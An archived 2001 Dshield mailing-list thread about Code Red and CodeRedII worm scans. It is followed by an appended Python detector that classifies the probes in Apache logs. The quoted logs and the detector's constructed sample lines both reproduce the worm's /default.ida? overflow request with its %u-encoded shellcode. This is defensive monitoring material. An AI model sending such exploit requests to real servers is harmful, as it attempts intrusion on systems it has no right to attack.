[Dshield] Code Red Host Scans (and more)

Andrew Redman aredman at san.rr.com
Sun Aug 5 02:50:21 GMT 2001


I recently sniffed a packet from the second variety of worm mentioned below,
and included in the packet was the text: "CodeRedII", which, although I
don't have a sniffed packet of the first version, seems to say that it is
the second version. Also, starting this morning (~10AM PST) the scans
started flooding in. Before today I've had a total of less than 60 scans to
my IP. Today, though, I've had over 60 every three hours, with about 75% of
them coming from IPs that share the first 2 octets with mine. It looks to
me like it's getting worse, as I have caught 4 more scans while writing this
post.

~~~~
Andrew Redman
Aredman at san.rr.com


On: Saturday, August 04, 2001 8:31 AM John Groseclose wrote:


> At 6:41 PM -0400 8/2/01, Tim Dwayne Southard wrote:
> My IDS (Cisco Secure) is not detecting the host scans from infected
> machines.  I can see the default.ida?NNN stuff but I think that is
> the second stage (infection).  I need to see the port 80 scans
> regardless of whether they are scanning MS boxes.  Any assistance
> will be repaid with good Karma.
>
> The "scan" *is* the "exploit." Code Red doesn't check first to see if
> you're running IIS before attempting to infect. There are no primary
> or secondary stages to the Code Red worm - it either infects your
> machine, or it doesn't.
>
> The weirder part is this... A "normal" Code Red attempt looks like this:
>
> cx215003-b.wwck1.ri.home.com - - [01/Aug/2001:04:31:50 -0700] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 400 324 "-" "-"
>
> Since 12:44:09 GMT, I've been receiving *these* in my logs:
>
> h-64-105-129-178.lsancaba.covad.net - - [04/Aug/2001:05:44:09 -0700] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 277 "-" "-"
> www.sacramentochats.com - - [04/Aug/2001:06:08:15 -0700] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 277 "-" "-"
>
> It *looks* like the second worm is trying to reboot the machine via
> an exploit for cmd.exe, but since I don't have any Windows machines
> around to work with, I can't really do any experimentation with it.
> Perhaps someone wrote a "counter-worm."
> --
> John Groseclose
> iain at caradoc.org
>
> _______________________________________________
> Dshield mailing list
> Dshield at dshield.org
> To change your subscription options (or unsubscribe), see:
> http://www1.dshield.org/mailman/listinfo/dshield
>
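
As an added example (not code from this thread or from the Dshield project), here is a Python check over constructed Apache log lines of the shape quoted above: it recognises the /default.ida? probe, tells the N-filler request (Code Red) from the X-filler request (CodeRedII), and, as Andrew did by eye, counts how many sources share the first two octets of the local address. The log regex, the documentation-range sample IPs and the function names are assumptions.

```python
import re
from collections import Counter

# Apache common/combined log prefix: host ident user [time] "request" status ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
# Worm request: GET /default.ida? + a long run of ONE filler byte + %u shellcode;
# filler 'N' is the original Code Red, filler 'X' the CodeRedII variant.
IDA_RE = re.compile(r'^/default\.ida\?(?P<fill>[NX])(?P=fill){99,}%u')
VARIANT = {"N": "CodeRed", "X": "CodeRedII"}

def classify(line):
    """Return {host, ts, variant, status} for a Code Red probe line, else None."""
    m = LOG_RE.match(line)
    if not m or m.group("method") != "GET":
        return None
    p = IDA_RE.match(m.group("path"))
    if not p:
        return None
    return {"host": m.group("host"), "ts": m.group("ts"),
            "variant": VARIANT[p.group("fill")], "status": int(m.group("status"))}

def summarise(lines, local_ip):
    """Count probes per variant and how many sources share our first two octets
    (the /16 check is only meaningful when the log records IPs, not hostnames)."""
    local16 = local_ip.split(".")[:2]
    hits = [h for h in map(classify, lines) if h]
    return {"total": len(hits),
            "by_variant": dict(Counter(h["variant"] for h in hits)),
            "same_slash16": sum(1 for h in hits if h["host"].split(".")[:2] == local16)}

# Constructed sample lines in the shape quoted in the thread: documentation IPs,
# 224 filler bytes, and the %u-encoded tail copied from the quoted log entries.
SHELLCODE = ("%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3"
             "%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a")

def _probe(host, ts, fill, status):
    return (f'{host} - - [{ts}] "GET /default.ida?{fill * 224}{SHELLCODE}'
            f'  HTTP/1.0" {status} 324 "-" "-"')

SAMPLE_LOG = [
    _probe("192.0.2.10", "01/Aug/2001:04:31:50 -0700", "N", 400),
    _probe("198.51.100.44", "04/Aug/2001:05:44:09 -0700", "X", 404),
    _probe("198.51.100.12", "04/Aug/2001:06:08:15 -0700", "X", 404),
    _probe("203.0.113.5", "04/Aug/2001:06:10:02 -0700", "X", 404),
    '198.51.100.9 - - [04/Aug/2001:06:11:00 -0700] "GET /index.html HTTP/1.0" 200 1043 "-" "-"',
]
```

Because the probe and the exploit attempt are the same request, a hit here is an infection attempt against the logging host, not a harmless scan, which is the point John makes above.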